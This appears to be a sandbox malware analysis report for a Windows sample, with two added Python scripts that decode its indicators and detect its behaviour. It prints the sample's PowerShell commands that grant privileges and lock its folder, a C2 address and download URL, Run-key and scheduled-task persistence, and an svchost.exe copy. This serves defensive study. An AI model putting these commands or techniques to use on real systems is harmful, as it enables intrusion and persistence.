                                                                                                                    • Instruction Fuzzy Hash: 42016D6240E3C05FD7128B258D94A52BFB4EF43224F1D80DBD8888F2A3C2695848C772
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.2367974825.000000000342D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0342D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_342d000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 18b98f349594db7226b60fbf33798cfc60e894bd8dd9de9caac09a29cbc8def2
                                                                                                                    • Instruction ID: ab231f5bfdc240865f1ee0ca45a7539096a5a811b9ea3c78b6f64560c8a9d35e
                                                                                                                    • Opcode Fuzzy Hash: 18b98f349594db7226b60fbf33798cfc60e894bd8dd9de9caac09a29cbc8def2
                                                                                                                    • Instruction Fuzzy Hash: FF01F7718043109AE720CA15CD84767FF98EF43338F9CC45BEC686E292C2799842C6B5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.2370957170.0000000003490000.00000040.00000800.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_3490000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 12ad349bcdd1aa053438f51f5e7572ddf719b6e3a833503e50aa7fd959d4afdf
                                                                                                                    • Instruction ID: 46605f85e025b5038b9c5ec9443bc9544c253de8532e69590155046c43640cce
                                                                                                                    • Opcode Fuzzy Hash: 12ad349bcdd1aa053438f51f5e7572ddf719b6e3a833503e50aa7fd959d4afdf
                                                                                                                    • Instruction Fuzzy Hash: 8EF0A974E0020A8FCB80DF68C485AAEBBF5FF49314F504199E509DB321D730A941CBD1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.2475123978.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_7b70000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4'eq$4'eq$4'eq$4'eq$$eq$$eq
                                                                                                                    • API String ID: 0-2296023852
                                                                                                                    • Opcode ID: e64b758c7847803e65db39167d1f91e9753463a13d03ac7b7b9e2a86a0db5279
                                                                                                                    • Instruction ID: 5f5d0a0ceaff7468c1b29d7c0f8fa034643cd63d4c8718a259ef4c893c6261c5
                                                                                                                    • Opcode Fuzzy Hash: e64b758c7847803e65db39167d1f91e9753463a13d03ac7b7b9e2a86a0db5279
                                                                                                                    • Instruction Fuzzy Hash: 61113AF2B092168FD7357528282517BABA3EFD251072901EFC051DB386DE248C42C3E2

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:1.8%
                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                    Signature Coverage:29.6%
                                                                                                                    Total number of Nodes:479
                                                                                                                    Total number of Limit Nodes:34
                                                                                                                    execution_graph [rendered call-graph figure; node and edge listing not reproduced as text]

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph [rendered figure for function 062467CC-0624688E; basic-block edge listing not reproduced as text]
                                                                                                                    APIs
                                                                                                                    • SetThreadExecutionState.KERNEL32(80000003), ref: 062467DD
                                                                                                                    • DeleteFileA.KERNEL32(C:\del), ref: 062467EE
                                                                                                                    • DeleteFileA.KERNEL32(C:\tzfz), ref: 062467F5
                                                                                                                    • DeleteFileA.KERNEL32(C:\1.ini), ref: 062467FC
                                                                                                                    • DeleteFileA.KERNEL32(C:\2.ini), ref: 06246803
                                                                                                                    • DeleteFileA.KERNEL32(C:\inst.ini), ref: 0624680A
                                                                                                                    • DeleteFileA.KERNEL32(C:\odbc.ini), ref: 06246811
                                                                                                                    • DeleteFileA.KERNEL32(C:\odbc.inst.ini), ref: 06246818
                                                                                                                    • DeleteFileA.KERNEL32(C:\ProgramData\Microsoft\EdgeUpdate\Log\chuangkou.log), ref: 0624681F
                                                                                                                      • Part of subcall function 06241C74: SetFileAttributesA.KERNEL32(00000000,00000080,0624682E,C:\ProgramData\Microsoft\Program\ziliao.jpg,00000000), ref: 06241C88
                                                                                                                      • Part of subcall function 06245CE6: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000001,00000000), ref: 06245CF6
                                                                                                                      • Part of subcall function 06245CE6: Process32First.KERNEL32(00000000,?), ref: 06245D0F
                                                                                                                      • Part of subcall function 06245CE6: Process32Next.KERNEL32(00000000,00000128), ref: 06245D2A
                                                                                                                      • Part of subcall function 06245CE6: CloseHandle.KERNEL32(00000000,00000002,00000000,00000001,00000000), ref: 06245D4F
                                                                                                                    • WinExec.KERNEL32(powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"'),00000000), ref: 062468AB
                                                                                                                    • WinExec.KERNEL32(powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -P,00000000), ref: 062468B3
                                                                                                                    • WinExec.KERNEL32(powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUA,00000000), ref: 062468BB
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,0624628E,00000000,00000000,00000000), ref: 062468D5
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,06245E1F,00000000,00000000,00000000), ref: 062468E9
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,06245D5B,00000000,00000000,00000000), ref: 062468FD
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,06246313,00000000,00000000,00000000), ref: 06246911
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,0624650A,00000000,00000000,00000000), ref: 06246925
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,06246780,00000000,00000000,00000000), ref: 06246931
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,06241B6D,00000000,00000000,00000000), ref: 0624693D
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,06246587,00000000,00000000,00000000), ref: 06246949
                                                                                                                    • WSAStartup.WS2_32(00000002,?), ref: 06246A11
                                                                                                                    • socket.WS2_32(00000002,00000001,00000000), ref: 06246A1C
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 06246A2B
                                                                                                                    • htons.WS2_32(00006365), ref: 06246A32
                                                                                                                    • inet_addr.WS2_32(202.79.169.178), ref: 06246A3D
                                                                                                                    • connect.WS2_32(?,00000002,00000010), ref: 06246A4F
                                                                                                                    • InternetOpenA.WININET(Mozilla/4.0 (compatible),00000000,00000000,00000000,00000000), ref: 06246A9F
                                                                                                                    • InternetOpenUrlA.WININET(?,?,00000000,00000000,80000100,00000000), ref: 06246AD7
                                                                                                                    • InternetReadFile.WININET(?,?,00000824,?), ref: 06246AF3
                                                                                                                    • InternetCloseHandle.WININET(?), ref: 06246B3C
                                                                                                                    • InternetCloseHandle.WININET(?), ref: 06246B45
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 06246B7A
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 06246BF4
                                                                                                                    • CopyFileA.KERNEL32(?,?,00000000), ref: 06246C06
                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 06246C20
                                                                                                                    • RegSetValueExA.ADVAPI32(?,06272BD8,00000000,00000001,?,00000018), ref: 06246C3B
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 06246C44
                                                                                                                    • Sleep.KERNEL32(0000003C), ref: 06246C51
                                                                                                                    • ExitProcess.KERNEL32 ref: 06246C5A
                                                                                                                    • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 06246C8E
                                                                                                                    • Sleep.KERNEL32(0000003C), ref: 06246CAD
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,000000E1), ref: 06246D1D
                                                                                                                    • CopyFileA.KERNEL32(?,C:\Windows\svchost.exe,00000000), ref: 06246D2F
                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 06246D56
                                                                                                                    Strings
                                                                                                                    • Cdefgh Jklmnopq Stuvwxya Cdef, xrefs: 06246D3F
                                                                                                                    • powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -P, xrefs: 062468AE
                                                                                                                    • iiiiiiiiiiiiiiii.exe, xrefs: 0624698C
                                                                                                                    • C:\ProgramData, xrefs: 06246853
                                                                                                                    • C:\inst.ini, xrefs: 06246805
                                                                                                                    • C:\tzfz, xrefs: 062467F0
                                                                                                                    • C:\ProgramData\Program, xrefs: 06246848, 06246B86
                                                                                                                    • SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 06246C16
                                                                                                                    • c:\inst.ini, xrefs: 06246967, 062469A3
                                                                                                                    • C:\Windows\svchost.exe, xrefs: 06246D23, 06246D27
                                                                                                                    • powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"'), xrefs: 062468A6
                                                                                                                    • C:\1.ini, xrefs: 062467F7
                                                                                                                    • C:\del, xrefs: 062467E9
                                                                                                                    • C:\ProgramData\Program\iusb3mon.exe, xrefs: 06246832
                                                                                                                    • iiiiiiiiiiiii.exe, xrefs: 062469C8
                                                                                                                    • C:\odbc.inst.ini, xrefs: 06246813
                                                                                                                    • C:\ProgramData\Data\upx.exe, xrefs: 0624685E
                                                                                                                    • C:\ProgramData\Data\upx.rar, xrefs: 06246874
                                                                                                                    • C:\ProgramData\Microsoft\Program, xrefs: 0624683D
                                                                                                                    • C:\2.ini, xrefs: 062467FE
                                                                                                                    • Cdefghij Lmnopqrst Vwxyabc Efghijkl Nop, xrefs: 06246D3A
                                                                                                                    • 360Tray.exe, xrefs: 06246890, 06246957
                                                                                                                    • C:\ProgramData\Microsoft\Program\ziliao.jpg, xrefs: 06246824
                                                                                                                    • http://%s/ip.txt, xrefs: 06246AB7
                                                                                                                    • 360tray.exe, xrefs: 06246881, 06246993
                                                                                                                    • C:\ProgramData\Microsoft\EdgeUpdate\Log\chuangkou.log, xrefs: 0624681A
                                                                                                                    • powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUA, xrefs: 062468B6
                                                                                                                    • C:\un.exe, xrefs: 06246869
                                                                                                                    • Mozilla/4.0 (compatible), xrefs: 06246A9A
                                                                                                                    • 202.79.169.178, xrefs: 062469F8, 06246A38, 06246AB0, 06246B17, 06246B2A
                                                                                                                    • C:\odbc.ini, xrefs: 0624680C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Thread$Create$Delete$Internet$Close$ExecHandleModuleNameOpenSleep$CopyProcess32$AttributesCtrlCurrentDispatcherExecutionExitFirstNextProcessReadServiceSnapshotStartStartupStateToolhelp32Valueconnecthtonsinet_addrsocket
                                                                                                                    • String ID: 202.79.169.178$360Tray.exe$360tray.exe$C:\1.ini$C:\2.ini$C:\ProgramData$C:\ProgramData\Data\upx.exe$C:\ProgramData\Data\upx.rar$C:\ProgramData\Microsoft\EdgeUpdate\Log\chuangkou.log$C:\ProgramData\Microsoft\Program$C:\ProgramData\Microsoft\Program\ziliao.jpg$C:\ProgramData\Program$C:\ProgramData\Program\iusb3mon.exe$C:\Windows\svchost.exe$C:\del$C:\inst.ini$C:\odbc.ini$C:\odbc.inst.ini$C:\tzfz$C:\un.exe$Cdefgh Jklmnopq Stuvwxya Cdef$Cdefghij Lmnopqrst Vwxyabc Efghijkl Nop$Mozilla/4.0 (compatible)$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$c:\inst.ini$http://%s/ip.txt$iiiiiiiiiiiii.exe$iiiiiiiiiiiiiiii.exe$powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -P$powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"')$powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUA
                                                                                                                    • API String ID: 1792369710-2203574426
                                                                                                                    • Opcode ID: aa1aa8fed73566867cebfffa9ccaa7a89ab4ed2632a76d6185dbbd272f40b18b
                                                                                                                    • Instruction ID: 00c45304bfc8936a9fc820322d5d36e67666b513ef1e632cb59c168059211fd6
                                                                                                                    • Opcode Fuzzy Hash: aa1aa8fed73566867cebfffa9ccaa7a89ab4ed2632a76d6185dbbd272f40b18b
                                                                                                                    • Instruction Fuzzy Hash: DFE1B5B1A6034DBEEB94BBA1ACC9EAF7E6DDF05758F004456F944B1081C6B18E84CB71
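Added example, not part of the Joe Sandbox report and not the sample's own code: the script below decodes the three indicators this function hard-codes, using only the literals visible above. It Base64-decodes the truncated [Convert]::FromBase64String fragment and shows it is a UTF-16LE, BOM-prefixed security template whose visible text ([Unicode], Unicode=yes, [Version], signature) matches the Set-Content arrays in the two preceding WinExec calls; it parses the [File Security] SDDL D:AR(D;OICI;DTSDRCWD;;;WD), an inheritable deny ACE that removes FILE_DELETE_CHILD, DELETE, READ_CONTROL and WRITE_DAC from Everyone on C:\ProgramData\Program, so the drop directory cannot be deleted or re-ACLed, even by an administrator, until someone first takes ownership (WRITE_OWNER is not denied); and it rebuilds the 16-byte sockaddr_in handed to connect(), turning the htons(0x6365) argument into TCP port 25445 on 202.79.169.178 and the http://%s/ip.txt template into the download URL. The [Privilege Rights] line, if this template were ever applied with secedit, would leave SeDebugPrivilege assigned to LocalSystem only, which strips it from Administrators; the page shows neither the template's output path (the Set-Content commands are cut off) nor a secedit call, and the code assumes neither. The SDDL token tables are the standard Windows ones.

```python
"""Decode the indicators hard-coded in the function above.

Added example; not Joe Sandbox output and not the sample's code. Every input
literal below is copied from the report (the Base64 is the truncated fragment
exactly as shown). The SDDL token tables are the standard Windows ones; the
'DT' right (0x40) is FILE_DELETE_CHILD when the ACE sits on a directory.
"""
import base64
import socket
import struct

INF_B64_FRAGMENT = ("//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBb"
                    "AFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUA")
SDDL_FILE_SECURITY = "D:AR(D;OICI;DTSDRCWD;;;WD)"   # [File Security] entry for C:\ProgramData\Program
C2_IP = "202.79.169.178"
C2_PORT_HOST_ORDER = 0x6365                        # the argument passed to htons()
URL_TEMPLATE = "http://%s/ip.txt"

ACE_TYPES = {"A": "ACCESS_ALLOWED", "D": "ACCESS_DENIED", "AU": "SYSTEM_AUDIT"}
ACE_FLAGS = {"OI": "OBJECT_INHERIT", "CI": "CONTAINER_INHERIT", "NP": "NO_PROPAGATE_INHERIT",
             "IO": "INHERIT_ONLY", "ID": "INHERITED"}
CONTROL = {"P": "PROTECTED", "AR": "AUTO_INHERIT_REQ", "AI": "AUTO_INHERITED"}
RIGHTS = {"DT": 0x00000040, "SD": 0x00010000, "RC": 0x00020000, "WD": 0x00040000,
          "WO": 0x00080000, "GX": 0x20000000, "GW": 0x40000000, "GR": 0x80000000,
          "GA": 0x10000000}
TRUSTEES = {"WD": "Everyone (S-1-1-0)", "BA": "BUILTIN\\Administrators (S-1-5-32-544)",
            "SY": "LOCAL SYSTEM (S-1-5-18)", "AU": "Authenticated Users (S-1-5-11)"}


def _pairs(s):
    """Split a run of two-letter SDDL tokens such as 'DTSDRCWD'."""
    return [s[i:i + 2] for i in range(0, len(s), 2)]


def decode_inf_fragment(b64):
    """Decode the WriteAllBytes payload: it starts with the UTF-16LE BOM FF FE,
    so the file written to %TEMP%\\SeDebugPrivilege4.inf is a Unicode .inf."""
    raw = base64.b64decode(b64)
    if raw[:2] != b"\xff\xfe":
        raise ValueError("expected UTF-16LE BOM")
    return raw.decode("utf-16")        # the codec consumes the BOM


def parse_sddl_dacl(sddl):
    """Parse 'D:<control>(type;flags;rights;;;trustee)...' into a dict."""
    if not sddl.startswith("D:"):
        raise ValueError("only DACL strings are handled here")
    control, _, ace_text = sddl[2:].partition("(")
    control_tokens, i = [], 0
    while i < len(control):                       # 'P' is one letter, the rest two
        tok = "P" if control[i] == "P" else control[i:i + 2]
        control_tokens.append(CONTROL.get(tok, tok))
        i += len(tok)
    aces = []
    for ace in ace_text.rstrip(")").split(")("):
        atype, flags, rights, _obj, _inherit_obj, sid = ace.split(";")
        aces.append({
            "type": ACE_TYPES.get(atype, atype),
            "flags": [ACE_FLAGS.get(f, f) for f in _pairs(flags)],
            "rights": _pairs(rights),
            "mask": sum(RIGHTS[r] for r in _pairs(rights)),
            "trustee": TRUSTEES.get(sid, sid),
        })
    return {"control": control_tokens, "aces": aces}


def build_sockaddr_in(ip, port_host_order):
    """The 16-byte sockaddr_in handed to connect(): sin_family is host order
    (little-endian on x86), sin_port and sin_addr are network order."""
    return (struct.pack("<H", 2)                         # AF_INET
            + struct.pack("!H", port_host_order)         # what htons() produces
            + socket.inet_aton(ip)                       # what inet_addr() produces
            + bytes(8))                                  # sin_zero


def indicators():
    """Everything the function needs to reach its C2, in one place."""
    return {"c2_ip": C2_IP, "c2_port": C2_PORT_HOST_ORDER,
            "c2_url": URL_TEMPLATE % C2_IP,
            "sockaddr_in": build_sockaddr_in(C2_IP, C2_PORT_HOST_ORDER).hex()}


if __name__ == "__main__":
    print(repr(decode_inf_fragment(INF_B64_FRAGMENT)))
    print(parse_sddl_dacl(SDDL_FILE_SECURITY))
    print(indicators())
```

The decoded fragment reads "[Unicode]\r\nUnicode=yes\r\n[Version]\r\nsignature" and stops where the report truncates the string; the parsed DACL is one ACCESS_DENIED ACE with OBJECT_INHERIT and CONTAINER_INHERIT, mask 0x70040, trustee Everyone, under an AUTO_INHERIT_REQ control flag.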

                                                                                                                     Control-flow Graph
                                                                                                                     control_flow_graph: function 001D2170-001D27F9 (the interactive graph's executed/not-executed legend and its node and edge dump are omitted here; the calls made in each basic block are the ones listed under APIs below: an initial Sleep, COM initialisation, CoCreateInstance of the Task Scheduler service, the task-definition and registration steps with their failure strings, and the MessageBoxA error path)
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNEL32(00002710,5EE195CD), ref: 001D21A2
                                                                                                                    • CoInitializeEx.OLE32(00000000,00000000), ref: 001D21AC
                                                                                                                    • CoCreateInstance.COMBASE(001EF104,00000000,00000001,001EF0F4,?), ref: 001D21EC
                                                                                                                    • CoUninitialize.COMBASE ref: 001D2209
                                                                                                                      • Part of subcall function 001D2DE0: std::_Lockit::_Lockit.LIBCPMT ref: 001D2E36
                                                                                                                      • Part of subcall function 001D2DE0: std::_Lockit::_Lockit.LIBCPMT ref: 001D2E58
                                                                                                                      • Part of subcall function 001D2DE0: std::_Lockit::~_Lockit.LIBCPMT ref: 001D2E78
                                                                                                                      • Part of subcall function 001D2DE0: std::_Facet_Register.LIBCPMT ref: 001D2EE5
                                                                                                                      • Part of subcall function 001D2DE0: std::_Lockit::~_Lockit.LIBCPMT ref: 001D2F01
                                                                                                                    • _com_issue_error.COMSUPP ref: 001D27CB
                                                                                                                    • MessageBoxA.USER32(00000000,001F89C0,001F89B8,00001010), ref: 001D27F1
                                                                                                                    Strings
                                                                                                                    • Failed to register task., xrefs: 001D2775
                                                                                                                    • Task registered successfully., xrefs: 001D2757
                                                                                                                    • Failed to create Task Service inst ance., xrefs: 001D21F6
                                                                                                                    • User Name, xrefs: 001D24E9
                                                                                                                    • Failed to create task definition., xrefs: 001D2499
                                                                                                                    • Failed to connect to Task Service., xrefs: 001D22D0, 001D2394
                                                                                                                    • C:\ProgramData\program\iusb3mon.exe, xrefs: 001D2587
                                                                                                                    • UserLoginStartupTask, xrefs: 001D267D
                                                                                                                    • Failed to initialize COM library., xrefs: 001D21B6
                                                                                                                    • Failed to get root folder., xrefs: 001D2453
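Added example, not report output and not the sample's code: detection logic for the behaviours recorded in the two functions above, run over constructed Sysmon-style event records that mirror the API calls listed (the records are made up for this example; field names loosely follow Sysmon process, registry, file and network events, and the "task" record stands in for Security event 4698, scheduled task created; the Run value name is an assumption, since the report shows only the address 06272BD8 for it). The rules are generic where the behaviour is generic (svchost.exe written anywhere but System32 or SysWOW64, a Run value or scheduled-task action under C:\ProgramData, powershell.exe writing a security template that names [Privilege Rights] or SeDebugPrivilege) and exact-match only for the C2 socket 202.79.169.178:25445.

```python
"""Detection rules for the behaviours in the two functions above.

Added example; not Joe Sandbox output and not the sample's code. The event
records are CONSTRUCTED for this example (field names loosely follow Sysmon
process/registry/file/network events; the 'task' record stands in for
Security event 4698). Paths, the task name and the C2 socket are taken from
the strings and API arguments listed on this page.
"""
import ntpath

C2_IP = "202.79.169.178"
C2_PORT = 0x6365  # 25445: the host-order value handed to htons() above
PROGRAMDATA = "c:\\programdata\\"
SVCHOST_DIRS = ("c:\\windows\\system32", "c:\\windows\\syswow64")


def _low(s):
    return (s or "").lower()


def rule_powershell_security_template(ev):
    """powershell.exe staging a secedit-style template: the command line names
    [Privilege Rights] or SeDebugPrivilege and writes it via Set-Content or
    [Convert]::FromBase64String, as in the three WinExec calls above."""
    if ev["type"] != "process" or not _low(ev["image"]).endswith("powershell.exe"):
        return False
    cl = ev["cmdline"]
    return (("[Privilege Rights]" in cl or "SeDebugPrivilege" in cl)
            and ("Set-Content" in cl or "FromBase64String" in cl))


def rule_run_key_to_programdata(ev):
    """Run-key value whose data points under C:\\ProgramData (the RegSetValueExA
    on HKCU\\...\\CurrentVersion\\Run above)."""
    return (ev["type"] == "registry"
            and _low(ev["key"]).endswith("\\currentversion\\run")
            and _low(ev["data"]).startswith(PROGRAMDATA))


def rule_svchost_outside_system32(ev):
    """svchost.exe created anywhere but System32/SysWOW64 (the CopyFileA to
    C:\\Windows\\svchost.exe above)."""
    if ev["type"] != "file":
        return False
    directory, name = ntpath.split(_low(ev["path"]))
    return name == "svchost.exe" and directory not in SVCHOST_DIRS


def rule_task_action_in_programdata(ev):
    """Scheduled task whose action runs from C:\\ProgramData (the
    UserLoginStartupTask registration in the COM function above)."""
    return ev["type"] == "task" and _low(ev["action"]).startswith(PROGRAMDATA)


def rule_c2_connect(ev):
    """Exact-match IOC: TCP connect to 202.79.169.178:25445."""
    return (ev["type"] == "network" and ev["dst_ip"] == C2_IP
            and ev["dst_port"] == C2_PORT)


RULES = {
    "powershell_security_template": rule_powershell_security_template,
    "run_key_to_programdata": rule_run_key_to_programdata,
    "svchost_outside_system32": rule_svchost_outside_system32,
    "task_action_in_programdata": rule_task_action_in_programdata,
    "c2_connect": rule_c2_connect,
}


def run_rules(events):
    """Return (rule_name, event_index) for every rule that fires."""
    return [(name, i) for i, ev in enumerate(events)
            for name, fn in RULES.items() if fn(ev)]


# Constructed records modelled on the report; the command line is abbreviated.
MALICIOUS_EVENTS = [
    {"type": "process",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -C \"Set-Content -Value @('[Unicode]',"
                "'[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]')\""},
    {"type": "registry", "key": "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
     "value": "iusb3mon",  # value name is an assumption; the report shows only an address
     "data": "C:\\ProgramData\\Program\\iusb3mon.exe"},
    {"type": "file", "path": "C:\\Windows\\svchost.exe",
     "image": "C:\\ProgramData\\Program\\iusb3mon.exe"},
    {"type": "task", "name": "UserLoginStartupTask",
     "action": "C:\\ProgramData\\program\\iusb3mon.exe"},
    {"type": "network", "image": "C:\\ProgramData\\Program\\iusb3mon.exe",
     "dst_ip": "202.79.169.178", "dst_port": 25445},
]

BENIGN_EVENTS = [
    {"type": "file", "path": "C:\\Windows\\System32\\svchost.exe",
     "image": "C:\\Windows\\servicing\\TrustedInstaller.exe"},
    {"type": "registry", "key": "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
     "value": "OneDrive",
     "data": "C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe"},
    {"type": "process",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -C \"Get-Service | Where-Object Status -eq Running\""},
    {"type": "task", "name": "GoogleUpdateTaskMachineUA",
     "action": "C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe"},
]

if __name__ == "__main__":
    for name, i in run_rules(MALICIOUS_EVENTS):
        print(f"{name}: event {i} {MALICIOUS_EVENTS[i]}")
```

Each of the five constructed malicious records fires exactly one rule and the four benign records fire none; the path-based rules are case-insensitive because the sample itself mixes C:\ProgramData\Program and C:\ProgramData\program.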
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4571601291.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                     • Associated: 0000001C.00000002.4571337549.00000000001D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4571918062.00000000001EE000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4572153673.00000000001FC000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4572420177.00000000001FE000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4572664793.0000000000203000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4572895265.0000000000204000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4573068486.0000000000206000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4573068486.000000000026C000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4573068486.000000000026E000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4573068486.0000000000270000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4573068486.0000000000274000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4573068486.0000000000276000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4573068486.0000000000278000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4573068486.000000000027A000.00000040.00000001.01000000.0000000D.sdmp
